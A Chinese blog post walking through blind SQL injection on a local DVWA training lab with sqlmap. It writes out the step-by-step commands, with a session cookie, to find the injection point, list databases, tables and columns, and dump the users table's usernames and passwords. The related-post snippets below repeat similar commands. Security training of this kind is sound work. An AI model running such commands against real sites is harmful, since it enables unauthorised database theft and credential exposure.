mysql注入 爆库_DVWA下的盲注<SQLmap工具注入>

最新推荐文章于 2024-05-03 15:00:01 发布
最新推荐文章于 2024-05-03 15:00:01 发布
阅读量258 收藏 1
点赞数
文章标签: mysql注入 爆库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_32557787/article/details/113614753
版权

LOW难度!!!

所需工具: DVWA环境、抓包工具、sqlmap

抓包工具用fiddler为例。

=====================================

先进入DVWA调整模式为LOW

0818b9ca8b590ca3270a3433284dd417.png

打开抓包工具,确定可以抓到http流量包

0818b9ca8b590ca3270a3433284dd417.png

DVWA下选择SQL盲注,随意输入一个USER ID后回车

会看到回显,用户ID存在

复制该网页链接,保存到记事本,等下sqlmap用

0818b9ca8b590ca3270a3433284dd417.png

用抓包工具获取本次提交的网页数据包里的cookie值

复制该cookie保存到记事本,等下sqlmap用

0818b9ca8b590ca3270a3433284dd417.png

打开sqlmap,查找注入点

输入命令:

-u       指定URL

--cookie     带cookie注入

python sqlmap.py-u "localhost/dvwa/vulnerabilities/sqli_blind

id=2&Submit=Submit"--cookie="PHPSESSID=jsqauesftt001qeq4jmb1brq95;security=low"

过程中出现提示默认回车即可。

得到结果:注入点可能是ID,数据库为Mysql

0818b9ca8b590ca3270a3433284dd417.png

爆库:

--dbs     发现所有数据库 (参数前有空格)

python sqlmap.py -u "localhost/dvwa/vulnerabilities/sqli_blind/?

id=2&Submit=Submit"--cookie="PHPSESSID=jsqauesftt001qeq4jmb1brq95;security=low"--dbs

列出数据库:

0818b9ca8b590ca3270a3433284dd417.png

--tables    列出数据库表  (参数前有空格)

-D            选择数据库

python sqlmap.py -u "localhost/dvwa/vulnerabilities/sqli_blind/?id=2&Submit=Submit"--cookie="PHPSESSID=jsqauesftt001qeq4jmb1brq95;security=low"--tables -D dvwa

查看列出的数据库表:

0818b9ca8b590ca3270a3433284dd417.png

列出users表的所有字段

�Ccolumns -T “users” (columns参数前带空格)

python sqlmap.py -u "localhost/dvwa/vulnerabilities/sqli_blind/?id=2&Submit=Submit"--cookie="PHPSESSID=jsqauesftt001qeq4jmb1brq95;security=low"--columns -T users

可以看到字段

0818b9ca8b590ca3270a3433284dd417.png

把users表直接存到本地

-T users --dump

python sqlmap.py -u "localhost/dvwa/vulnerabilities/sqli_blind/?id=2&Submit=Submit"--cookie="PHPSESSID=jsqauesftt001qeq4jmb1brq95;security=low" -T users --dump

0818b9ca8b590ca3270a3433284dd417.png

打开下载的文件即可看到用户名,密码

0818b9ca8b590ca3270a3433284dd417.png

最后结果:

0818b9ca8b590ca3270a3433284dd417.png

欢迎各位大神指点批评!

晨风

445n9
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
网络安全-实验七-SQL注入-盲注+sqlmap使用.docx
11-10
在这个实验中,我们将深入理解SQL注入盲注类型,并学习如何使用sqlmap工具进行自动化探测和利用。 一、SQL注入-盲注 1. 盲注的基本原理是通过观察应用程序的响应时间或者返回结果的微妙变化来判断SQL查询的结果...
DVWA-SQL盲注脚本(全)
10-04
DVWA SQL盲注,Low,Medium,High 三个级别的bool盲注脚本,比较完整,配套解释 : https://blog.csdn.net/csdn_Pade/article/details/82886765
布尔盲注sqlmap爆破
m0_52699073的博客
01-23 1381
布尔盲注sqlmap爆破 ————————————————————————————— 好久没有更新了,语句也忘的差不多了…。作为菜鸟的我也是终于弄懂了这道题,以及部分语句的意思。我将用尽可能详细且易理解的语言来表达。 sqlmap爆破(首先你得下载sqlmap,csdn中刚好有) 注入语句:python sqlmap.py -u"XXXXX" -batch是基本的注入框架。 一.爆破数据库的库名 输入:python sqlmap.py -u"http://challenge-cb6615ef28a95b3
sql盲注、头注与爆破练习
0xcc'Blog
04-08 353
SQL注入
SQL注入漏洞扫描---sqlmap
嘿嘿嘿
05-03 2400
数据库--数据表---字段---字段内容一站式识别
Sqlmap
mumuzi2的博客
02-25 387
下载地址: http://sqlmap.org/ 需要环境: python 使用方法:
安全中级11:sql注入+联合、报错、时间盲注+sqlmap使用
weixin_62870380的博客
07-02 3658
sql注入的原理和流程,以及联合注入、报错注入、时间盲注、布尔盲注以及sqlmap使用。
sqlmap实现dvwa中的盲注详解
永不垂头的博客
08-06 2870
sqlmap实现dvwa中的盲注详解 一、 dvwasql盲注 ① 启动Burpsuite,在SQL injection(Blind)中输入如下,然后查看Burpsuite中抓到的URL和Cookie。 ② 启动sqlmap,在上图中复制URL和cookie,在sqlmap中输入:sqlmap –u ‘复制的URL’ --cookie=’复制的cookie’ ,可以查看数据库类型。 PHPSESSID=jmrh7e40u41fjch3g2ht57dv00 Cookie: security=low
sqlmap在windows上执行sql注入,利用dvwa靶场.md
05-19
分享一下自己学习sqlmap的过程,因为网上的资源很少,所以就想着写个博客记录一下,同时也分享一下吧。就先讲到这里吧,有问题的可以私信。欢迎大家提意见。
DVWA通关必备软件集(DVWA、PHPStudy、SqlMap、BurpSuite、AntSword、Python、JRE)
最新发布
05-30
Windows中DVWA通关必备软件集(DVWA、PHPStudy、SqlMap、BurpSuite、AntSword、Python、JRE),包含安装使用说明。 Windows中部署DVWADVWA、PHPStudy Windows中使用SqlMapSqlMap、Python Windows中使用BurpSuite...
DVWASQL注入详解(包含知识点)
10-20
该文档是使用DVWA平台进行的SQL注入(low)级别的详细操作和知识点分析,包括什么是SQL注入,如何进行SQL注入,图文并茂,包含了几个非常不错的操作,解决了各种问题。
sqlmap 盲注使用
devil8123665的博客
04-17 6829
sql盲注 sqlmap.py -u "http://192.168.190.159/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=vdc32duqf2vlc92tepq3fvfp70" --technique B --dbs --batch 通过上文...
DVWA——SQL注入+盲注
qq_58553228的博客
06-02 1170
目的:执行特定sql语句,获得其他相关内容。攻击方式:动态构造SQL语句影响:数据库的脱裤、修改、甚至影响到操作系统。
针对dvwa中的sql盲注=》Sqlmap工具注入
wangc的博客
04-07 563
Sqlmap工具注入:kali-sqlmap工具: (ps:其实这就是我的实验报告,哈哈哈) 进行low等级: 获取cookie:(火狐浏览器,或者其他各式浏览器都行) 进行sqlmap sqlmap –u “http://192.168.1.9/dvwa/vulnerabilities/sqli_blind/?id=2&Submit=Submit#” --cookie=” security=low; PHPSESSID=kol19emhbh8t4otgmsq8akuuva” 当前使用的数
SQL Injection (Blind)之盲注(原理、分类、利用)
weixin_51513059的博客
03-24 3520
SQL注入过程中,SQL语句执行后,选择的数据不能回显到前端页面,此时需要利用一些方法进行判断或者尝试,这个过程称之为盲注。在盲注中,攻击者根据其返回页面的不同来判断信息(可能是页面内容的不同,也可以是响 应时间不同)。一般情况下,盲注可分为两类:基于布尔的盲注(Boolean based)基于时间的盲注(Time based)
sqlmap)【sqli-labs8-10】盲注:布尔盲注、时间盲注
07-06 3574
sqlmap-跑盲注靶场】
DVWA通过攻略之SQL注入
勿山几已
05-24 8512
简单介绍SQL注入,演示手工进行SQL注入及利用sqlmap进行自动化SQL注入
深谈SQL注入(进阶篇:盲注
2301_76251460的博客
04-14 827
SQL盲注
sqlmap入门-爆库,爆表,列,字段
weixin_46626737的博客
11-14 6945
①当判断a为get注入点后(get) 可使用python sqlmap.py -u "url?a=1" --dbs爆数据库 假设结果中有member数据库 ②爆表 python sqlmap.py -u "url?a=1" --tables -D member 假设有表student ③爆列 python sqlmap.py -u "url?a=1" --column -T student -D member 假设有列id,password,stasus等列 ④爆字段 python sq
dvwa sql注入盲注
10-09
DVWA(Damn Vulnerable Web Application)中进行盲注的过程也类似。下面是一个简单的示例: 假设我们有一个登录页面,我们可以通过输入用户名和密码来验证用户身份。在用户名字段中,我们可以尝试输入一些恶意的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值